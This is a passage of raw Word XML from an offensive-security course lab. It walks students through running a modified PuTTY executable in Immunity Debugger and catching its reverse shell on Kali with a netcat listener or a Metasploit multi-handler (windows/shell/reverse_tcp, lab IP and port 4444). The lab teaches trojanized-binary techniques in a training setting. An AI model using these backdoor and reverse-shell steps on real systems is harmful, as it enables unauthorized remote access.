      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Load the new putty2b.exe into Immunity Debugger and let us add breakpoints to our code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C774FA" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EDF702B" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>On your Kali Linux machine either create a netcat listener, or a Metasploit multi-handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDEDC53" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CB75547" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>NetCat Listner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704F3D10" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FF9900"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FF9900"/>
        </w:rPr>
        <w:t>nc -nvlp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE67877" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66A82533" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Multi-Handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA809AA" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FF9900"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FF9900"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5887AD6D" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FF9900"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FF9900"/>
        </w:rPr>
        <w:t xml:space="preserve">use exploit/multi/handler </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6815134D" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FF9900"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FF9900"/>
        </w:rPr>
        <w:t>set payload windows/shell/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B924F9C" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FF9900"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FF9900"/>
        </w:rPr>
        <w:t>set LHOST 192.168.210.129</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0704D6F6" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FF9900"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FF9900"/>
        </w:rPr>
        <w:t>set LPORT 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB75330" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FF9900"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FF9900"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FF3EA4" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5912EA20" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45ACB194" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Now run the application and then hit the X to exit the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D256072" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DF1BB8B" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Now follow the breakpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB4C44C" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4ADB7ABD" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>If everything went as planned, go back to your Kali Linux system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61008A7C" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CCDB17A" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>What did you get? :)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1E8DE2" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7135D49D" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Try running it without the debugger. What happened? :)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392A901C" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30E74C6D" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Congrats!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346BCBAA" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2670F8F9" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="570C357B" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>I hope by the end of this course you learned something and this lab also showed you that you must be extremely cautious and aware!</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="004C25E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1AFB9" w14:textId="77777777" w:rsidR="00556E95" w:rsidRDefault="00556E95">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2A6C3677" w14:textId="77777777" w:rsidR="00556E95" w:rsidRDefault="00556E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A36A" w14:textId="77777777" w:rsidR="000F751E" w:rsidRDefault="000F75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8D60E" w14:textId="18D9D2DB" w:rsidR="004C25E3" w:rsidRDefault="000E7D03">
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="216"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      </w:rPr>
      <w:t>@2022</w:t>
    </w:r>
    <w:r w:rsidR="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      </w:rPr>
      <w:tab/>
    </w:r>
    <w:hyperlink r:id="rId1" w:history="1">
      <w:r w:rsidRPr="000E7D03">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>exploitation.ashemery.com</w:t>
      </w:r>
    </w:hyperlink>
    <w:r w:rsidR="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      </w:rPr>
      <w:tab/>
    </w:r>
    <w:r w:rsidR="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      </w:rPr>
      <w:tab/>
    </w:r>
    <w:r w:rsidR="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      </w:rPr>
      <w:tab/>
    </w:r>
    <w:r w:rsidR="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      </w:rPr>
      <w:tab/>
    </w:r>
    <w:r w:rsidR="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidR="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      </w:rPr>
      <w:instrText>PAGE</w:instrText>
    </w:r>
    <w:r w:rsidR="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00047CE3">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        <w:noProof/>
      </w:rPr>
      <w:t>1</w:t>
    </w:r>
    <w:r w:rsidR="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r w:rsidR="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      </w:rPr>
      <w:t>/</w:t>
    </w:r>
    <w:r w:rsidR="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidR="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      </w:rPr>
      <w:instrText>NUMPAGES</w:instrText>
    </w:r>
    <w:r w:rsidR="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00047CE3">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        <w:noProof/>
      </w:rPr>
      <w:t>2</w:t>
    </w:r>
    <w:r w:rsidR="00000000">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C1BEA" w14:textId="77777777" w:rsidR="000F751E" w:rsidRDefault="000F7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16EE9" w14:textId="77777777" w:rsidR="00556E95" w:rsidRDefault="00556E95">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1064ABEF" w14:textId="77777777" w:rsidR="00556E95" w:rsidRDefault="00556E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895DB" w14:textId="77777777" w:rsidR="000F751E" w:rsidRDefault="000F75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024BD" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3">
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:jc w:val="right"/>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
    </w:pPr>
  </w:p>
  <w:tbl>
    <w:tblPr>
      <w:tblStyle w:val="a0"/>
      <w:tblW w:w="9576" w:type="dxa"/>
      <w:tblInd w:w="-108" w:type="dxa"/>
      <w:tblLayout w:type="fixed"/>
      <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
    </w:tblPr>
    <w:tblGrid>
      <w:gridCol w:w="8140"/>
      <w:gridCol w:w="1436"/>
    </w:tblGrid>
    <w:tr w:rsidR="004C25E3" w14:paraId="4E7E027D" w14:textId="77777777">
      <w:trPr>
        <w:trHeight w:val="460"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="8140" w:type="dxa"/>
          <w:shd w:val="clear" w:color="auto" w:fill="8064A2"/>
          <w:vAlign w:val="center"/>
        </w:tcPr>
        <w:p w14:paraId="00BE599B" w14:textId="2BA1DFD5" w:rsidR="004C25E3" w:rsidRDefault="000F751E">
          <w:pPr>
            <w:tabs>
              <w:tab w:val="center" w:pos="4680"/>
              <w:tab w:val="right" w:pos="9360"/>
            </w:tabs>
            <w:spacing w:line="240" w:lineRule="auto"/>
            <w:ind w:left="216"/>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:color w:val="FFFFFF"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:b/>
              <w:smallCaps/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t xml:space="preserve">OFFENSIVE SECURITY </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:b/>
              <w:smallCaps/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t xml:space="preserve">&amp; </w:t>
          </w:r>
          <w:r w:rsidR="00000000">
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:b/>
              <w:smallCaps/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t>REVERSE ENGINEERING (</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:b/>
              <w:smallCaps/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t>OSRE</w:t>
          </w:r>
          <w:r w:rsidR="00000000">
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:b/>
              <w:smallCaps/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t>)</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="1436" w:type="dxa"/>
          <w:shd w:val="clear" w:color="auto" w:fill="000000"/>
          <w:vAlign w:val="center"/>
        </w:tcPr>
        <w:p w14:paraId="21803500" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
          <w:pPr>
            <w:tabs>
              <w:tab w:val="center" w:pos="4680"/>
              <w:tab w:val="right" w:pos="9360"/>
            </w:tabs>
            <w:spacing w:line="240" w:lineRule="auto"/>
            <w:ind w:left="216"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:color w:val="FFFFFF"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:b/>
              <w:color w:val="FFFFFF"/>
            </w:rPr>
            <w:t>2022</w:t>
          </w:r>
        </w:p>
      </w:tc>
    </w:tr>
  </w:tbl>
  <w:p w14:paraId="5332514F" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3">
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>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215B" w14:textId="77777777" w:rsidR="000F751E" w:rsidRDefault="000F75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B41E8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="511031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93C79C5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B7302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5A5856"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="45E6E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29197B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5F6651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E20F22"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9C9A5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66376307">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="483131975">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1617102718">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1331059187">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1771660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5E3"/>
    <w:rsid w:val="00047CE3"/>
    <w:rsid w:val="000E7D03"/>
    <w:rsid w:val="000F751E"/>
    <w:rsid w:val="004C25E3"/>
    <w:rsid w:val="00556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8B33"/>
  <w15:docId w15:val="{09DA3075-9D85-48A4-9977-7E45C8FE5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0F751E"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="000F751E"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000F751E"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="000F751E"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000E7D03"/>
    <w:rPr>
      <w:color w:val="0000FF" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000E7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exploitation.ashem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889</Words>
  <Characters>5068</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>42</Lines>
  <Paragraphs>11</Paragraphs>
  <ScaleCrop>false</ScaleCrop>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4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-12-31T06:05:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-12-31T06:06:00Z</dcterms:modified>
</cp:coreProperties>
</file>